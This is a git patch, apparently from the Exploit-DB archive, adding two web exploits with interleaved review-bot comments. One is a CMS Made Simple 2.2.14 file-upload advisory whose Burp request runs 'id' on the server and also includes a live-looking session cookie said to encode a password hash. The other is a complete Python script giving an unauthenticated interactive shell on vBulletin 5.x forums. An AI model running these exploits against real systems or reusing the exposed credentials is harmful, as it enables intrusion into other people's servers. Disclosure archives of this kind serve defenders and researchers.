From a999edcbb650e912ce8d92d023af555609c072b8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 13 Aug 2020 05:01:49 +0000 Subject: [PATCH] DB: 2020-08-13 2 changes to exploits/shellcodes CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
---
exploits/php/webapps/48742.txt | 53 ++++++++++++++++++++++++++++++++++ exploits/php/webapps/48743.txt | 42 +++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 97 insertions(+) create mode 100644 exploits/php/webapps/48742.txt create mode 100644 exploits/php/webapps/48743.txt
diff --git a/exploits/php/webapps/48742.txt b/exploits/php/webapps/48742.txt
new file mode 100644
index 000000000..7b35973ef
--- /dev/null
+++ b/exploits/php/webapps/48742.txt
@@ -0,0 +1,53 @@
+# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
+# Google Dork: -
+# Date: 2020-07-29
+# Exploit Author: Roel van Beurden
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
+# Version: 2.2.14
+# Tested on: Linux Ubuntu 18.04
+# CVE: N/A
+
+
+1. Description:
+----------------------
+CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution.
+
+
+2. Proof of Concept:
+----------------------
+- Create .phtml or .ptar file with malicious PHP payload;
+- Upload .phtml or .ptar file in the 'File Manager' module;
+- Click on the uploaded file to perform remote code execution.
+
+
+3: Example payload:
+----------------------
+
+
+
+4a: Burp request:
+----------------------
+GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1
+Host: 10.10.10.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+
+Cookie: d2f3b04a992e92af78d4f451813df40fa6f4f4b4=2c462b984c95aa0a8d18f59e2dd21defb7d7e368%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiUm9lbCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCQ4NS5qSy5nTTMxZmJEQmlGTXlIYlQuUUR5eFRDekpsSVFncjhOS1FMbDhBSUlIUjVYeVNJZSJ9; __c=e9ef732e78dc5a9f603; CMSSESSIDde72be53c754=71mvdcppeeunddtap69k26ia4v
+
+Upgrade-Insecure-Requests: 1
+
+
+4b: Burp response:
+----------------------
+HTTP/1.1 200 OK
+Date: Thu, 30 Jul 2020 23:14:47 GMT
+Server: Apache/2.4.29 (Ubuntu)
+Content-Length: 54
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
\ No newline at end of file
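Review bot: The `Cookie:` header in section 4a is reproduced verbatim, and the base64 segment after `%3A%3A` appears to decode to a JSON object carrying the author's username and a `$2y$10$…` bcrypt password hash, so the advisory ships live session and credential material that has no documentary value. Replace the three cookie values with placeholders, e.g. `Cookie: <session-cookie-redacted>`; the request still documents the vulnerable endpoint and the `.phtml` extension without them. Section `3: Example payload` contains only blank lines in this rendering, which may be an extraction artifact; if the file really ships without it, a one-line remark that the payload is intentionally omitted would stop readers assuming the text is truncated. Recording whether the vendor was notified and which release, if any, blocks the two extensions would also help readers decide whether an upgrade closes the issue.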
diff --git a/exploits/php/webapps/48743.txt b/exploits/php/webapps/48743.txt
new file mode 100644
index 000000000..7dd0c26d1
--- /dev/null
+++ b/exploits/php/webapps/48743.txt
@@ -0,0 +1,42 @@
+# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
+# Date: 2020-08-09
+# Exploit Author: @zenofex
+# Vendor Homepage: https://www.vbulletin.com/
+# Software Link: None
+# Version: 5.4.5 through 5.6.2
+# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
+# CVE : None
+
+# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
+# execution vulnerability caused by incomplete patching of the previous
+# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
+# request to execute PHP code on a target vBulletin forum.
+
+#More info can be found at:
+#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
+
+
+#!/usr/bin/env python3
+# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex
+
+import argparse
+import requests
+import sys
+
+def run_exploit(vb_loc, shell_cmd):
+ post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd}
+ r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
+ return r.text
+
+ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
+ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
+ARGS = ap.parse_args()
+
+while True:
+ try:
+ cmd = input("vBulletin5$ ")
+ print(run_exploit(ARGS.location, cmd))
+ except KeyboardInterrupt:
+ sys.exit("\nClosing shell...")
+ except Exception as e:
+ sys.exit(str(e))
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 523a166ec..f3274508b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
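Review bot: The affected-version range is stated inconsistently within the hunk: the header says `# Version: 5.4.5 through 5.6.2` while the comment block a few lines below says `vBulletin 5.5.4 through 5.6.2`; one of the two looks like a digit transposition, and the lower bound is exactly what an administrator checks when deciding whether an install needs patching, so the two lines should agree. The `# CVE : None` line sits next to a reference to the earlier CVE-2019-16759, which invites confusion about which issue is meant; a wording such as `# CVE : None assigned at time of writing (incomplete fix of CVE-2019-16759)` would make the relationship explicit. The Python body appears to have lost its block indentation in this rendering (`+ post_data = …`, `+ try:`), which is likely a collapse artifact rather than the committed content, but is worth confirming against the stored file.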
@@ -42983,3 +42983,5 @@ id,file,description,date,author,type,platform,port
 48738,exploits/php/webapps/48738.txt,"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)",2020-08-10,boku,webapps,php,
 48739,exploits/java/webapps/48739.txt,"ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)",2020-08-10,"Bhadresh Patel",webapps,java,
 48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,
+48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php,
+48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,